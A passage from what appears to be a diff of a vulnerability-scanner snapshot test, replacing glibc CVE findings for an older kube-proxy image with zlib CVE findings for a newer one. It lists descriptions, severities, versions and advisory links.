"https://linux.oracle.com/errata/ELSA-2023-1095.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "https://security.netapp.com/advisory/ntap-20220901-0005/", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://support.apple.com/kb/HT213488", + "https://support.apple.com/kb/HT213489", + "https://support.apple.com/kb/HT213490", + "https://support.apple.com/kb/HT213491", + "https://support.apple.com/kb/HT213493", + "https://support.apple.com/kb/HT213494", + "https://ubuntu.com/security/notices/USN-5570-1", + "https://ubuntu.com/security/notices/USN-5570-2", + "https://ubuntu.com/security/notices/USN-5573-1", + "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "https://www.debian.org/security/2022/dsa-5218", ], }, "category": "Vulnerability", - "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", + "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19126", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19126", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "value": "https://avd.aquasec.com/nvd/cve-2022-37434", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", + "value": "http://seclists.org/fulldisclosure/2022/Oct/37", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "value": "http://seclists.org/fulldisclosure/2022/Oct/38", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "value": "http://seclists.org/fulldisclosure/2022/Oct/42", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "value": "https://access.redhat.com/errata/RHSA-2022:8291", }, { "type": "URL", - "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-37434", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4416-1", + "value": "https://bugzilla.redhat.com/2116639", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4416-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://errata.rockylinux.org/RLSA-2022:8291", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://github.com/curl/curl/issues/9271", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-27645", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-27645", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", - "https://linux.oracle.com/cve/CVE-2021-27645.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", - "https://security.gentoo.org/glsa/202107-07", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://www.cve.org/CVERecord?id=CVE-2021-27645", - ], - }, - "category": "Vulnerability", - "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-27645", + "value": "https://github.com/ivd38/zlib_overflow", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-27645", + "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", + "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33574", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33574", - "https://linux.oracle.com/cve/CVE-2021-33574.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210629-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", - "https://www.cve.org/CVERecord?id=CVE-2021-33574", - ], - }, - "category": "Vulnerability", - "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: mq_notify does not handle separately allocated thread attributes", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33574", + "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33574", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://support.apple.com/kb/HT213489", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://support.apple.com/kb/HT213490", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "value": "https://support.apple.com/kb/HT213491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "value": "https://support.apple.com/kb/HT213493", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "value": "https://support.apple.com/kb/HT213494", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://ubuntu.com/security/notices/USN-5570-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + "value": "https://ubuntu.com/security/notices/USN-5570-2", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "value": "https://ubuntu.com/security/notices/USN-5573-1", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "value": "https://www.debian.org/security/2022/dsa-5218", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-35942", - "installedVersion": "2.28-10", - "packageName": "libc6", + "fixedVersion": "1:1.2.11.dfsg-2+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-25032", + "installedVersion": "1:1.2.11.dfsg-2", + "packageName": "zlib1g", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", - "https://access.redhat.com/security/cve/CVE-2021-35942", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", - "https://linux.oracle.com/cve/CVE-2021-35942.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", - "https://security.gentoo.org/glsa/202208-24", - "https://security.netapp.com/advisory/ntap-20210827-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", - "https://sourceware.org/glibc/wiki/Security%20Exceptions", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "https://access.redhat.com/errata/RHSA-2022:8420", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "https://access.redhat.com/security/cve/CVE-2018-25032", + "https://bugzilla.redhat.com/2067945", + "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "https://github.com/madler/zlib/issues/605", + "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "https://linux.oracle.com/cve/CVE-2018-25032.html", + "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "https://security.gentoo.org/glsa/202210-42", + "https://security.netapp.com/advisory/ntap-20220526-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5355-1", + "https://ubuntu.com/security/notices/USN-5355-2", + "https://ubuntu.com/security/notices/USN-5359-1", + "https://ubuntu.com/security/notices/USN-5359-2", + "https://ubuntu.com/security/notices/USN-5739-1", + "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "https://www.debian.org/security/2022/dsa-5111", + "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", + "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Arbitrary read in wordexp()", + "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-35942", + "value": "https://avd.aquasec.com/nvd/cve-2018-25032", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-35942", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", + "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8420", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://access.redhat.com/security/cve/CVE-2018-25032", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", + "value": "https://bugzilla.redhat.com/2067945", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", }, { "type": "URL", - "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "value": "https://github.com/madler/zlib/issues/605", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23218", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23218", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", - "https://linux.oracle.com/cve/CVE-2022-23218.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23218", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23218", + "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23218", + "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", + "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23218", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23219", - "installedVersion": "2.28-10", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23219", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", - "https://linux.oracle.com/cve/CVE-2022-23219.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23219", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "The deprecated compatibility function clnt_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its hostname argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in sunrpc clnt_create via a long pathname", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23219", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23219", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23219", + "value": "https://security.gentoo.org/glsa/202210-42", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23219.html", + "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23219", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22542", + "value": "https://ubuntu.com/security/notices/USN-5355-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://ubuntu.com/security/notices/USN-5355-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://ubuntu.com/security/notices/USN-5359-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-23219", + "value": "https://ubuntu.com/security/notices/USN-5359-2", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5739-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2022/dsa-5111", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + }, + { + "type": "URL", + "value": 